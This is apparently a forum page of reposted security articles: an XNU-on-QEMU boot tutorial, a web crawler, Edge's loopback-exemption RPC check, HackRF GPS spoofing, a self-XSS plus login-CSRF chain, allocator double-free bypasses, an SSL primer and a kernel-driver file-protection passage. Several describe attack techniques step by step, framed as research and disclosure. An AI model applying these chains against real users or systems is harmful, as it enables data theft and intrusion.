the XNUQEMUScripts repo) Run ./linux_installgdb.sh to download the Linaro GDB. Running QEMU Place your qemu directory into the same directory as the scripts, kernel, devicetree, and ramdisk. You should have these files: ~/xnuqemu_dist$ ls README.md lldbit.sh devicetree.dtb lldbscript.lldb devicetreefromim4p.py modifydevicetree.py fixbootdelay_lldbscript_doc.txt qemu gdbit.sh ramdisk.dmg gdbscript.gdb readdevicetree.py kcache_out.bin runqemu.sh linux_installgdb.sh windows_installgdb.sh ./runqemu.sh to start QEMU. $ ./runqemu.sh QEMU 2.12.90 monitor - type 'help' for more information (qemu) xnu in a different terminal, ./lldbit.sh to start lldb, or if you’re using Linux, ./gdbit.sh to start gdb. $ ./lldbit.sh (lldb) target create "kcache_out.bin" Current executable set to 'kcache_out.bin' (arm64). (lldb) process connect --plugin gdb-remote connect://127.0.0.1:1234 (lldb) command source -s 0 'lldbscript.lldb' Executing commands in 'lldbscript.lldb'. (lldb) b *0xFFFFFFF007433BE8 Breakpoint 1: address = 0xfffffff007433be8 (lldb) breakpoint command add Enter your debugger command(s). Type 'DONE' to end. (lldb) b *0xFFFFFFF005FA5D84 Breakpoint 2: address = 0xfffffff005fa5d84 (lldb) breakpoint command add Enter your debugger command(s). Type 'DONE' to end. (lldb) b *0xfffffff00743e434 Breakpoint 3: address = 0xfffffff00743e434 (lldb) breakpoint command add Enter your debugger command(s). Type 'DONE' to end. (lldb) b *0xfffffff00743e834 Breakpoint 4: address = 0xfffffff00743e834 (lldb) Type c into lldb or gdb to start execution. In the terminal running QEMU, you should see boot messages. Congratulations, you’ve just ran a tiny bit of iOS with a virtual iPhone! Or as UnthreadedJB would say, “#we r of #fakr!” What works Booting XNU all the way to running userspace programs Console output from virtual serial port What doesn’t work Wi-Fi Bluetooth USB Screen Internal storage Everything except the serial port You tell me Seriously, though, this only runs a tiny bit of iOS, and is nowhere close to iOS emulation. To borrow a simile from the creator of Corellium, if Corellium is a DeLorean time machine, then this is half a wheel at most. This experiment only finished the easy part of booting iOS, as it doesn’t emulate an iPhone at all, relying on only the parts common to all ARM devices. No drivers are loaded whatsoever, so there’s no emulation of the screen, the USB, the internal storage… You name it: it doesn’t work. For full iOS emulation, the next step would be reverse engineering the iPhone’s SoC to find out how its peripherals work. Unfortunately, that’s a 9-year project, as shown by the development history of Corellium. I can’t do that on my own - that’s why I wrote this tutorial! It’s my hope that this work inspires others to look into proper iOS emulation - from what I’ve seen, it’ll be a great learning experience. How I did this Last week, I started modifying QEMU to load an iOS kernel and device tree: the previous writeup is here. Here’s how I got from crashing when loading kernel modules to fully booting the kernel. Tweaking CPU emulation, part 3: Interrupting cow When we left off, the kernel crashed with a data abort when it tries to bzero a write only region of memory. Why? To confirm that it’s indeed writing to read-only memory, I implemented a command to dump out the kernel memory mappings, and enabled QEMU’s verbose MMU logging to detect changes to the memory map. I tracked down the crashing code to OSKext::updateLoadedKextSummaries. After every kext load, this code resets the kext summaries region to writable with vm_map_protect, writes information for the new kext, then sets the region back to read-only. The logs show that the call to protect the region modifies the memory mappings, but the call to reset it to read-write doesn’t do anything. Why isn’t it setting the page to writable? According to comments in vm_map_protect, it turns out that readonly->readwrite calls actually don’t change the protection immediately, but only sets it on-demand when a program tries - and fails - to write to the page. This is to implement copy on write. So, it seems the data abort exception is supposed to happen, but the panic is not. In the data abort exception, the page should be set to writable in arm_fast_fault. The code in open-source XNU can only return KERN_FAILURE or KERN_SUCCESS, but with a breakpoint, I saw it was returning KERN_PROTECTION_FAILURE. I checked the disassembly: yes, there’s extra code (0xFFFFFFF0071F953C in iOS 12 beta 4) returning KERN_PROTECTION_FAILURE if the page address doesn’t match one of the new KTRR registers added on the A11 processor . I had been ignoring all writes to KTRR registers, so this code can’t read the value from the register (which the kernel stored at startup), and believes that all addresses are invalid. Thus, instead of setting the page to writable, the kernel panics instead. I fixed this by adding these registers to QEMU’s virtual CPU, allowing the kernel to read and write them. After this change, a few more kexts started up, but the kernel then hangs… like it’s waiting for something. Connecting the timer interrupt My hunch for why the kernel hangs: one of the kexts tries to sleep for some time during initialization, but never wakes up because there are no timer interrupts, as shown by QEMU not logging any exceptions when it hangs. On ARM, there are two ways for hardware to signal the CPU: IRQ, shared by many devices, or FIQ, dedicated to just one device. QEMU’s virt machine hooks up the processor’s timer to IRQ, like most real ARM platforms. FIQ is usually reserved for debuggers. Apple, however, hooks up the timer directly to the FIQ. With virt’s timer hooked up to the wrong signal, the kernel would wait forever for an interrupt that would never come. All I had to do to get the timer working was to hook it up to FIQ. This gets me… a nice panic in the Image4 parser. Getting the Image4 parser module working panic(cpu 0 caller 0xfffffff006c1edb8): "could not instantiate ppl environment: 0x60"@/BuildRoot/Library/Caches/com.apple.xbs/Sources/AppleImage4/AppleImage4-1.200.12/include/abort.h:24 What does this mean? What’s error 0x60? I found the panic string, and looked for where the error message is generated. It turns out that the Image4 parser queries the device tree for various nodes in “/chosen” or “/default”; if the value doesn’t exist, it returns error 0x60. If the value is the wrong size, it returns 0x54. iOS’s device tree is missing two properties: chip-epoch and security-domain, which causes the module to panic with the 0x60 error. Oddly, the device tree doesn’t reserve extra space for these properties. I had to delete two existing properties to make space for them. With the modified device tree, the Image4 module initializes, but now I have a panic from a data abort in rorgn_lockdown. Failed attempt to get device drivers to not crash Of course the KTRR driver crashes when it tries to access the memory controller: there isn’t one! QEMU’s virt machine doesn’t have anything mapped at that address. Since I don’t have an emulation of the memory controller, I just added a block of empty memory to avoid the crash. This strategy didn’t work for the next crash, though, from the AppleInterruptController driver. That driver reads and validates values from the device, so just placing a blank block of memory causes the driver to panic. Something more drastic is needed if I don’t want to spend 9 years reverse engineering each driver. Driverless like we’re Waymo To boot XNU, I don’t really need all those drivers, do I? Who needs interrupts or the screen or power management or storage, anyways? All XNU needs to boot into userspace is a serial port and a timer. I disabled every other driver in the kernel. Drivers are loaded if their IONameMatch property corresponds to a device’s “compatible”, “name”, or “device_type” fields. To disable all the drivers, I erased every “compatible” property in the device tree, along with a few “name” and “device_type” properties. Now, with no drivers, XNU seems to hang, but after I patiently waited for a minute… Waiting on <dict ID="0"><key>IOProviderClass</key><string ID="1">IOMedia</string><key>Content</key><string ID="2">Apple_HFS</string></dict> Still waiting for root device It’s trying to mount the root filesystem! Loading a RAMDisk If it’s looking for a root filesystm, let’s give it one. I don’t have any drivers for storage, but I can mount an iOS Recovery RAMDisk, which requires no drivers. All I had to do was: Load the ramdisk at the end of the kernel, just before the device tree blob put its address and size in the device tree so XNU can find it set boot argument to rd=md0 to boot from ramdisk hfs: mounted PeaceSeed16A5327f.arm64UpdateRamDisk on device b(2, 0) The kernel mounts the root filesystem! … but then hangs again. Using LLDB to patch out hanging functions By putting breakpoints all over bsd_init, I found that the kernel was hanging in IOBSDSecureRoot, when it tries to call the platform function. The platform function looks for a device, but since I removed all the device drivers, it waits forever, in vain. To fix this, I just skipped the problematic call. I used an LLDB breakpoint to jump over the call and simulate a true return instead. And, after three weeks, the virtual serial port finally printed out: : : Darwin Bootstrapper Version 6.0.0: Mon Jul 9 00:39:56 PDT 2018; root:libxpc_executables-1336.200.86~25/launchd/RELEASE_ARM64 “Houston, the kernel has booted.” What I learned quirks of iOS memory management how iOS handles timer interrupts how iOS loads ramdisks building QEMU on different platforms modifying QEMU to add new CPU configuration registers differences between GDB and LLDB’s command syntax how to get people to subscribe to my mailing list. (muhahaha, one last signup link.) Thanks Thanks to everyone who shared or commented on my last article. To those who tried building and running it - sorry about taking so long to write up instructions! Thanks to @matteyeux, @h3adsh0tzz, @_th0ex, and @enzolovesbacon for testing the build instructions. Thanks to @winocm, whose darwin-on-arm project originally inspired me to learn about the XNU kernel. Sursa: https://worthdoingbadly.com/xnuqemu2/
      • 1
      • Upvote
  12. Nytro

    Photon

    Photon Photon is a lightning fast web crawler which extracts URLs, files, intel & endpoints from a target. Yep, I am using 100 threads and Photon won't complain about it because its in Ninja Mode ? Why Photon? Not Your Regular Crawler Crawlers are supposed to recursively extract links right? Well that's kind of boring so Photon goes beyond that. It extracts the following information: URLs (in-scope & out-of-scope) URLs with parameters (example.com/gallery.php?id=2) Intel (emails, social media accounts, amazon buckets etc.) Files (pdf, png, xml etc.) JavaScript files & Endpoints present in them The extracted information is saved in an organized manner. Intelligent Multi-Threading Here's a secret, most of the tools floating on the internet aren't properly multi-threaded even if they are supposed to. They either supply a list of items to threads which results in multiple threads accessing the same item or they simply put a thread lock and end up rendering multi-threading useless. But Photon is different or should I say "genius"? Take a look at this and decide yourself. Ninja Mode In Ninja Mode, 3 online services are used to make requests to the target on your behalf. So basically, now you have 4 clients making requests to the same server simultaneously which gives you a speed boost, minimizes the risk of connection reset as well as delays requests from a single client. Here's a comparison generated by Quark where the lines represent threads: Usage -u --url Specifies the URL to crawl. python photon.py -u http://example.com -l --level It specifies how much deeper should photon crawl. python photon.py -u http://example.com -l 3 Default Value: 2 -d --delay It specifies the delay between requests. python photon.py -u http://example.com -d 1 Default Value: 0 -t --threads The number of threads to use. python photon.py -u http://example.com -t 10 Default Value: 2 Note: The optimal number of threads depends on your connection speed as well as nature of the target server. If you have a decent network connection and the server doesn't have any rate limiting in place, you can use up to 100 threads. -c --cookie Cookie to send. python photon.py -u http://example.com -c "PHPSSID=821b32d21" -n --ninja Toggles Ninja Mode on/off. python photon.py -u http://example.com --ninja Default Value: False -s --seeds Lets you add custom seeds, sperated by commas. python photon -u http://example.com -s "http://example.com/portals.html,http://example.com/blog/2018" Contribution & License Apart from reporting bugs and stuff, please help me add more "APIs" to make the Ninja Mode more powerful. Photon is licensed under GPL v3.0 license. Sursa: https://github.com/s0md3v/Photon
  13. Sunday, 22 July 2018 UWP Localhost Network Isolation and Edge This blog post describes an interesting “feature” added to Windows to support Edge accessing the loopback network interface. For reference this was on Windows 10 1803 running Edge 42.17134.1.0 as well as verifying on Windows 10 RS5 17713 running 43.17713.1000.0. I like the concept of the App Container (AC) sandbox Microsoft introduced in Windows 8. It moved sandboxing on Windows from restricted tokens which were hard to reason about and required massive cludges to get working to a reasonably consistent capability based model where you are heavily limited in what you can do unless you’ve been granted an explicit capability when your application is started. On Windows 8 this was limited to a small set of known capabilities. On Windows 10 this has been expanded massively by effectively allowing an application to define its own capabilities and enforce them though the normal Windows access control mechanisms. I’ve been looking at AC more and it's ability to do network isolation, where access to the network requires being granted capabilities such as “internetClient”, seems very useful. It’s a little known fact that even in the most heavily locked down, restricted token sandbox it’s possible to open network sockets by accessing the raw AFD driver. AC solves this issue quite well, it doesn’t block access to the AFD driver, instead the Firewall checks for the capabilities and blocks connecting or accepting sockets. One issue does come up with building a generic sandboxing mechanism this AC network isolation primitive is regardless of what capabilities you grant it’s not possible for an AC application to access localhost. For example you might want your sandboxed application to access a web server on localhost for testing, or use a localhost proxy to MITM the traffic. Neither of these scenarios can be made to work in an AC sandbox with capabilities alone. The likely rationale for blocking localhost is allowing sandboxed content access can also be a big security risk. Windows runs quite a few services accessible locally which could be abused, such as the SMB server. Rather than adding a capability to grant access to localhost, there's an explicit list of packages exempt from the localhost restriction stored by the firewall service. You can access or modify this list using the Firewall APIs such as the NetworkIsolationSetAppContainerConfig function or using the CheckNetIsolation tool installed with Windows. This behavior seems to be rationalized as accessing loopback is a developer feature, not something which real applications should rely on. Curious, I wondered whether I had AC’s already in the exemption list. You can list all available exemptions by running “CheckNetIsolation LoopbackExempt -s” on the command line. On my Windows 10 machine we can see two exemptions already installed, which is odd for a developer feature which no applications should be using. The first entry shows “AppContainer NOT FOUND” which indicates that the registered SID doesn’t correspond to a registered AC. The second entry shows a very unhelpful name of “001” which at least means it’s an application on the current system. What’s going on? We can use my NtObjectManager PS module and it's 'Get-NtSid' cmdlet on the second SID to see if that can resolve a better name. Ahha, “001” is actually a child AC of the Edge package, we could have guessed this by looking at the length of the SID, a normal AC SID had 8 sub authorities, whereas a child has 12, with the extra 4 being added to the end of the base AC SID. Looking back at the unregistered SID we can see it’s also an Edge AC SID just with a child which isn’t actually registered. The “001” AC seems to be the one used to host Internet content, at least based on the browser security whitepaper from X41Sec (see page 54). This is not exactly surprising. It seems when Edge was first released it wasn’t possible to access localhost resources at all (as demonstrated by an IBM help article which instructs the user to use CheckNetIsolation to add an exemption). However, at some point in development MS added an about:flags option to enable accessing localhost, and seems it’s now the default configuration, even though as you can see in the following screenshot it says enabling can put your device at risk. What’s interesting though is if you disable the flags option and restart Edge then the exemption entry is deleted, and re-enabling it restores the entry again. Why is that a surprise? Well based on previous knowledge of this exemption feature, such as this blog post by Eric Lawrence you need admin privileges to change the exemption list. Perhaps MS have changed that behavior now? Let’s try and add an exemption using the CheckNetIsolation tool as a normal user, passing “-a -p=SID” parameters. I guess they haven’t as adding a new exemption using the CheckNetIsolation tool gives us access denied. Now I’m really interested. With Edge being a built-in application of course there’s plenty of ways that MS could have fudged the “security” checks to allow Edge to add itself to the list, but where is it? The simplest location to add the fudge would be in the RPC service which implements the NetworkIsolationSetAppContainerConfig. (How do I know there's an RPC service? I just disassembled the API). I took a guess and assumed the implementation would be hosted in the “Windows Defender Firewall” service, which is implemented in the MPSSVC DLL. The following is a simplified version of the RPC server method for the API. HRESULT RPC_NetworkIsolationSetAppContainerConfig(handle_t handle, DWORD dwNumPublicAppCs, PSID_AND_ATTRIBUTES appContainerSids) { if (!FwRpcAPIsIsPackageAccessGranted(handle)) { HRESULT hr; BOOL developer_mode = FALSE: IsDeveloperModeEnabled(&developer_mode); if (developer_mode) { hr = FwRpcAPIsSecModeAccessCheckForClient(1, handle); if (FAILED(hr)) { return hr; } } else { hr = FwRpcAPIsSecModeAccessCheckForClient(2, handle); if (FAILED(hr)) { return hr; } } } return FwMoneisAppContainerSetConfig(dwNumPublicAppCs, appContainerSids); } What’s immediately obvious is there's a method call, FwRpcAPIsIsPackageAccessGranted, which has “Package” in the name which might indicate it’s inspecting some AC package information. If this call succeeds then the following security checks are bypassed and the real function FwMoneisAppContainerSetConfig is called. It's also worth noting that the security checks differ depending on whether you're in developer mode or not. It turns out that if you have developer mode enabled then you can also bypass the admin check, which is confirmation the exemption list was designed primarily as a developer feature. Anyway let's take a look at FwRpcAPIsIsPackageAccessGranted to see what it’s checking. const WCHAR* allowedPackageFamilies[] = { L"Microsoft.MicrosoftEdge_8wekyb3d8bbwe", L"Microsoft.MicrosoftEdgeBeta_8wekyb3d8bbwe", L"Microsoft.zMicrosoftEdge_8wekyb3d8bbwe" }; HRESULT FwRpcAPIsIsPackageAccessGranted(handle_t handle) { HANDLE token; FwRpcAPIsGetAccessTokenFromClientBinding(handle, &token); WCHAR* package_id; RtlQueryPackageIdentity(token, &package_id); WCHAR family_name[0x100]; PackageFamilyNameFromFullName(package_id, family_name) for (int i = 0; i < _countof(allowedPackageFamilies); ++i) { if (wcsicmp(family_name, allowedPackageFamilies[i]) == 0) { return S_OK; } } return E_FAIL; } The FwRpcAPIsIsPackageAccessGranted function gets the caller’s token, queries for the package family name and then checks it against a hard coded list. If the caller is in the Edge package (or some beta versions) the function returns success which results in the admin check being bypassed. The conclusion we can take is this is how Edge is adding itself to the exemption list, although we also want to check what access is required to the RPC server. For an ALPC server there’s two security checks, connecting to the ALPC port and an optional security callback. We could reverse engineer it from service binary but it is easier just to dump it from the ALPC server port, again we can use my NtObjectManager module. As the RPC service doesn’t specify a name for the service then the RPC libraries generate a random name of the form “LRPC-XXXXX”. You would usually use EPMAPPER to find the real name but I just used a debugger on CheckNetIsolation to break on NtAlpcConnectPort and dumped the connection name. Then we just find the handle to that ALPC port in the service process and dump the security descriptor. The list contains Everyone and all the various network related capabilities, so any AC process with network access can talk to these APIs including Edge LPAC. Therefore all Edge processes can access this capability and add arbitrary packages. The implementation inside Edge is in the function emodel!SetACLoopbackExemptions. With this knowledge we can now put together some code which will exploit this “feature” to add arbitrary exemptions. You can find the PowerShell script on my Github gist. Wrap Up If I was willing to speculate (and I am) I’d say the reason that MS added localhost access this way is it didn’t require modifying kernel drivers, it could all be done with changes to user mode components. Of course the cynic in me thinks this could actually be just there to make Edge more equal than others, assuming MS ever allowed another web browser in the App Store. Even a wrapper around the Edge renderer would not be allowed to add the localhost exemption. It’d be nice to see MS add a capability to do this in the future, but considering current RS5 builds use this same approach I’m not hopeful. Is this a security issue? Well that depends. On the one hand you could argue the default configuration which allows Internet facing content to then access localhost is dangerous in itself, they point that out explicitly in the about:flags entry. Then again all browsers have this behavior so I’m not sure it’s really an issue. The implementation is pretty sloppy and I’m shocked (well not that shocked) that it passed a security review. To list some of the issues with it: ● The package family check isn’t very restrictive, combined with the weak permissions of the RPC service it allows any Edge process to add an arbitrary exemption. ● The exemption isn’t linked to the calling process, so any SID can be added as an exemption. While it seems the default is only to allow the Internet facing ACs access to localhost because of these weaknesses if you compromised a Flash process (which is child AC “006”) then it could add itself an exemption and try and attack services listening on localhost. It would make more sense if only the main MicrosoftEdge process could add the exemptions, not any content process. But what would make the most sense would be to support this functionality through a capability so that everyone could take advantage of it rather than implementing it as a backdoor. Sursa: https://tyranidslair.blogspot.com/2018/07/uwp-localhost-network-isolation-and-edge.html
  14. July 19, 2018 Using a HackRF to Spoof GPS Navigation in Cars and Divert Drivers Researchers at Virginia Tech, the University of Electronic Science and Technology of China and Microsoft recently released a paper discussing how they were able to perform a GPS spoofing attack that was able to divert drivers to a wrong destination (pdf) without being noticed. The hardware they used to perform the attack was low cost and made from off the shelf hardware. It consisted of a Raspberry Pi 3, HackRF SDR, small whip antenna and a mobile battery pack, together forming a total cost of only $225. The HackRF is a transmit capable SDR. The idea is to use the HackRF to create a fake GPS signal that causes Google Maps running on an Android phone to believe that it's current location is different. They use a clever algorithm that ensures that the spoofed GPS location remains consistent with the actual physical road networks, to avoid the driver noticing that anything is wrong. The attack is limited in that it relies on the driver paying attention only to the turn by turn directions, and not looking closely at the map, or having knowledge of the roads already. For example, spoofing to a nearby location on another road can make the GPS give the wrong 'left/right' audio direction. However, in their real world tests they were able to show that 95% of test subjects followed the spoofed navigation to an incorrect destination. In past posts we've seen the HackRF and other transmit capable SDRs used to spoof GPS in other situations too. For example some players of the once popular Pokemon Go augmented reality game were cheating by using a HackRF to spoof GPS. Others have used GPS spoofing to bypass drone no-fly restrictions, and divert a superyacht. It is also believed that the Iranian government used GPS spoofing to safely divert and capture an American stealth drone back in 2011. Other researchers are working on making GPS more robust. Aerospace Corp. are using a HackRF to try and fuse GPS together with other localization methods, such as by using localizing signals from radio towers and other satellites. [Also seen on Arstechnica] Hardware and Method used to Spoof Car GPS Navigation. Sursa: https://www.rtl-sdr.com/using-a-hackrf-to-spoof-gps-navigation-in-cars-and-divert-drivers/
  15. PeNet PeNet is a parser for Windows Portable Executable headers. It completely written in C# and does not rely on any native Windows APIs. Furthermore it supports the creation of Import Hashes (ImpHash), which is a feature often used in malware analysis. You can extract Certificate Revocation List, compute different hash sums and other useful stuff for working with PE files. For help see the Wiki. The API reference can be found hrere: http://secana.github.io/PeNet License Apache 2 Copyright 2016 Stefan Hausotte Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Sursa: https://github.com/secana/PeNet
      • 1
      • Upvote
  16. Escalating Low Severity Bugs To High Severity This time I am gonna share about some ways that I have learned & applied while participating in bounty programs and was able to escalate Low severity issues to higher severity. Let's Go To the Technical details straight: Note: You might also be able to use Window Object instead of Iframe in the following Cases I mention but it's better to use "Iframe" instead of "Window" to be stealthier and have least User-Interaction though it requires Clickjacking to be present too. Case #1. Self Stored-XSS and Login-Logout CSRF: Pre-Requisites: 1.) Victim must be loggedIn on the Application 2.) Some kind of sensitive information of the currently authenticated user should be present on some page(via Web API etc.) ATTACKER Having Self-Stored XSS in Profile Description: Attack Summary:- 1. Victim Visits Attacker's Page 2. Create 2 Iframes Frame #1(VICTIM) pointing to the sensitive info page (eg. CreditCards, API Keys, Secrets, password hashes, messages etc. which is only visible to the authenticated user) Frame #2(ATTACKER) pointing to Self-Stored XSS page 3. Perform the following on the Attacker Page: Once the Frame #1 is loaded completely a) Logout from Victim's account b) Login to Attacker's/your Account using the login CSRF In the Frame #2 c) Execute the Self-Stored XSS in your(attacker's) and Access the Frame #1 using top.frames[0].document.body.outerHTML since the Same Origin and steal it and send that info to your server Full article: https://www.noob.ninja/2018/07/escalating-low-severity-bugs-to-high.html
      • 1
      • Upvote
  17. double-free-examples Basic code examples of conditions that still work and other nuances relating to double free's primarily in glibc, and to a lesser extent tcmalloc and jemalloc. These primarily revolve around one very basic concept: many allocators "optimize" the double free security checks to only ensure that we are not deallocating the most recently deallocated chunk. This leads to the behavior that if you can deallocate one chunk, then a different one, then the prior one a second time you can bypass the sanity checks. This pattern holds with tcmalloc (chrome/et cetera), jemalloc (firefox) and glibc (linux). Furthermore, the way of the world is moving towards things like vtable/vptr verification and control flow semantics to detect and prevent the corruption of function pointers which have pioneered the bypass to the stack cookie, and GCC now ships with vtable verification. In some instances, we have some rather neat conditions where you can bypass vptr verification and have 2 objects occupy the same memory, a sort of schrodinger's object condition. There is at present no real method for preventing related attacks, beyond ensuring that double free conditions do not occur. (atlanta, seattle - as the paper was moving along my work contract was suddenly canceled and relocated to SEA where I was never given time to work on anything until I punted with the expectation that BH would come back after editing and review. I'm probably the reason they have a board for that sort of thing now, just like I'm probably the reason the SF86 has that last page on it now.) Sursa: https://github.com/jnferguson/double-free-examples
      • 1
      • Upvote
  18. SSL/TLS for dummies part 1 : Ciphersuite, Hashing,Encryption June 22, 2018 As a security enthusiast, I always fond of the working of SSL (TLS these days). It took me days to understand the very basic working of this complex protocol. But once you understand the underlying concepts and algorithm, the entire protocol would feel quite simple. I’ve learned a lot of things while learning the working of SSL. Encryption being the first thing. I started recollecting the cryptography stuffs learned from university. Those days, I was like meh while studying them. Now, I know why teachers fed me up with all the encryption stuff. I know how much cryptography makes my life easier. I wanted to share everything I learned here at my space. And I definitely hope this will be much useful to you. So let’s begin. History of SSL When talking about the history of SSL, one shouldn’t miss Mozilla Foundation. The first thing that comes to our mind while talking about Mozilla is their famous browser Firefox. According to various sources, Firefox is the most popular browser after Chrome and Safari. But Netscape was the great predecessor of Firefox and during the 90’s it was the most popular browser among internet surfers. Anyway, by the introduction of Internet Explorer by Microsoft, Netscape’s era came to an end and later they started the great Mozilla Foundation and it still grows. Netscape in 1994 introduced SSL for its Netscape Navigator browser. The primary objective was to prevent Man In The Middle attacks. Later, with increase in internet accessibility banks started to make use of internet for transactions. That time, security was a major concern and IETF(Internet Engineering Task Force), the people who standardize internet protocols, standardized SSL by making their own version. This was in 1999 and now the protocol is known as TLS(Transport Layer Security, the latest version being TLS 1.3. Few notes about cryptography First things first, before digging deep into the topic, we need to have a basic understanding on couple of things. Most important one is cryptography. You don’t need to be Cryptography expert to understand SSL. But a basic understanding is necessary. We will discuss the very basics here. Those who already know Asymmetric and Symmetric key encryption can skip this section and go to the next part. So cryptography deals with numbers and strings. Basically every digital thing in the entire universe are numbers. When I say numbers, its 0 & 1. You know what they are, binary. The images you see on screen, the music that you listen through your earphone, everything are binaries. But our ears and eyes will not understand binaries right? Only brain could understand that, and even if it could understand binaries, it can’t enjoy binaries. So we convert the binaries to human understandable formats such as mp3,jpg,etc. Let’s term the process as Encoding. It’s two way process and can be easily decoded back to its original form. Hashing Hashing is another cryptography technique in which a data once converted to some other form can never be recovered back. In Layman’s term, there is no process called de-hashing. There are many hash functions to do the job such as sha-512, md5 and so on. The sha-512 value of wst.space is, 83d98e97ec1efc3cb4d20f81a246bff06a1c145b7c06c481defed6ef31ce6ad78db3ecb36e7ce097966f019eab7bdc7ffa6b 3fb8c5226871667ae13a6728c63b You can verify this by going to some online hash creator website and typing wst.space. If the original value cannot be recovered, then where do we use this? Passwords! When you set up a password for your mobile or PC, a hash of your password is created and stored in a secure place. When you make a login attempt next time, the entered string is again hashed with the same algorithm (hash function) and the output is matched with the stored value. If it’s the same, you get logged in. Otherwise you are thrown out. Credits: wikimedia By applying hash to the password, we can ensure that an attacker will never get our password even if he steal the stored password file. The attacker will have the hash of the password. He can probably find a list of most commonly used passwords and apply sha-512 to each of it and compare it with the value in his hand. It is called the dictionary attack. But how long would he do this? If your password is random enough, do you think this method of cracking would work? We have discussed about session cookies in one of our blog posts. The value is session cookies are usually hashed. All the passwords in the databases of Facebook, Google and Amazon are hashed, or at least they are supposed to be hashed. Then there is Encryption Encryption lies in between hashing and encoding. Encoding is a two way process and should not be used to provide security. Encryption is also a two way process, but original data can be retrieved if and only if the encryption key is known. If you don’t know how encryption works, don’t worry, we will discuss the basics here. That would be enough to understand the basics of SSL. So, there are two types of Encryption namely Symmetric and Asymmetric encryption. Symmetric Key Encryption I am trying to keep things as simple as I could. So, let’s understand the symmetric encryption by means of a shift algorithm. This algorithm is used to encrypt alphabets by shifting the letters to either left or right. Let’s take a string CRYPTO and consider a number +3. Then, the encrypted format of CRYPTO will be FUBSWR. That means each letter is shifted to right by 3 places. Here, the word CRYPTO is called Plaintext, the output FUBSWR is called the Ciphertext, the value +3 is called the Encryption key (symmetric key) and the whole process is a cipher. This is one of the oldest and basic symmetric key encryption algorithm and its first usage was reported during the time of Julius Caesar. So, it was named after him and it is the famous Caesar Cipher. Anyone who knows the encryption key and can apply the reverse of Caesar’s algorithm and retrieve the original Plaintext. Hence it is called a Symmetric Encryption. Credits: Wikimedia Can we use symmetric cryptography with TLS? As you understand, this algorithm is pretty easy to crack since the possibilities are less. We can change the value of key from 1 to anything and iterate through the 26 letters one by one. Note that the value of key is limited to 26, provided we are encrypting only small case english alphabets. It’s a matter of milliseconds for our computers to Bruteforce this process. Nowadays, there are complex algorithms such as AES (Advanced Encryption Standard) and 3DES (Triple Data Encryption Algorithm). They are considered to be really really difficult to crack. This is the encryption technique used in SSL/TLS while sending and receiving data. But, the client and server needs to agree upon a key and exchange it before starting to encrypt the data, right? The initial step of exchanging the key will obviously be in plain text. What if the attacker captures the key while sharing it? Then there is no point in using it. So we need a secure mechanism to exchange the keys without an attacker actually seeing it. There comes the role of Asymmetric Key Encryption. Asymmetric Key Encryption We know that, in Symmetric encryption same key is used for both encryption and decryption. Once that key is stolen, all the data is gone. That’s a huge risk and we need more complex technique. In 1976, Whitfield Diffie and Martin Hellman first published the concept of Asymmetric encryption and the algorithm was known as Diffie–Hellman key exchange. Then in 1978, Ron Rivest, Adi Shamir and Leonard Adleman of MIT published the RSA algorithm. These can be considered as the foundation of Asymmetric cryptography. As compared to Symmetric encryption, in Asymmetric encryption, there will be two keys instead of one. One is called the Public key, and the other one is the Private key. Theoretically, during initiation we can generate the Public-Private key pair to our machine. Private key should be kept in a safe place and it should never be shared with anyone. Public key, as the name indicates, can be shared with anyone who wish to send encrypted text to you. Now, those who have your public key can encrypt the secret data with it. If the key pair were generated using RSA algorithm, then they should use the same algorithm while encrypting the data. Usually the algorithm will be specified in the public key. The encrypted data can only be decrypted with the private key which is owned by you. Can we use Asymmetric encryption for all the TLS Asymmetric encryption is also known as Public Key Infrastructure a.k.a PKI, reason is self explanatory. Anyway, as long as you keep the private key secure, the data is safe. Great! So, probably by now you will be thinking, why would we still use symmetric encryption in TLS? We have a lot secure PKI in place. Yes, agree, but it should be noted that security has to be dealt without affecting usability. Since PKI involves a double key architecture and the key length is usually large, the encryption-decryption overhead is very high. It takes more time and CPU usage as compared to symmetric key encryption. So, when sending and receiving data between client and server, the user will feel more wait time, and the browser will start to eat the CPU. So PKI is used only to exchange the symmetric key between the client and server. Thereafter symmetric key encryption comes into play and further data transmission makes use of this technique. Well, I know I am just beating around the bush here. Because I haven’t really jumped into the topic yet. Please keep the things we have discussed so far in mind and come back to this space. We are going deep from next blog post. Sursa: https://www.wst.space/ssl-part1-ciphersuite-hashing-encryption/
      • 1
      • Upvote
  19. Kernel Mode Rootkits: File Deletion Protection dtm waifu pillow collector Hey guys, back with just another casual article from me this time around since one of my projects failed miserably and I don’t really have the time for another serious one. Also I’ve getting into something new, as you may have already guessed, kernel-mode development! Yeah, pretty exciting stuff and I’m here to share a little something I’ve learned that might be interesting to you all. Brace yourselves! Disclaimer: The following article documents what I’ve learned and may or may not be completely accurate because I am very new to this. Of course I would never intentionally provide misinformation to this community, but please approach it relatively lightly. If there are any mistakes, please do not hesitate to inform me so I can fix them. I would also like to apologise for any garbage code, I can’t help it. :’) Windows Kernel Mode Drivers and I/O Request Packets So just really briefly, since this is not an article about kernel mode or drivers in general, I will describe some basic concepts that will aid in the understanding of the content I will present. The first thing is what’s called an “I/O Request Packet” (IRP for short) which represent the majority of what is delivered to the operating system and drivers. This can be things like a file request or a keyboard key press. What happens with IRPs and drivers is that the IRP is sent down a “stack” of drivers that are registered (with the I/O manager) to process them. It looks something like this: IORequestFlow.jpg579x565 48.1 KB Obtained from http://www.windowsbugcheck.com/2017/05/device-objects-and-driver-stack-part-2.html 1 The IRP falls down the stack until it reaches the device or driver that is capable of handling the specified request and then it will get sent back upwards once it is fulfilled. Note that the IRP does not necessarily have to go all the way down to the bottom to be completed. File Deletion Protection Here I will present the high-level conceptual overview on how it is possible to protect a file from being deleted. The condition which I have selected in order for this mechanism to prevent a file from deletion is that the file must have the .PROTECTED extension (case-insensitive). Previously, I have described that IRPs must be sent down the driver stack until the bottom or until it can be completed. If a special driver can be slotted into a position in the driver stack before whatever fulfills the targeted IRPs, it has the power to filter the request and interrupt or modify it if desired. This notion serves as the core to the file deletion protection mechanism. In order to detect if IRPs should be interrupted from deletion, it simply needs to extract the file extension and compare it to whatever is disallowed for deletion. If the extensions match, the driver will prevent the IRP from any further processing by completing the request and sending it back up the driver stack with an error. It may look a little something like this: ^ +------------+ | +> | 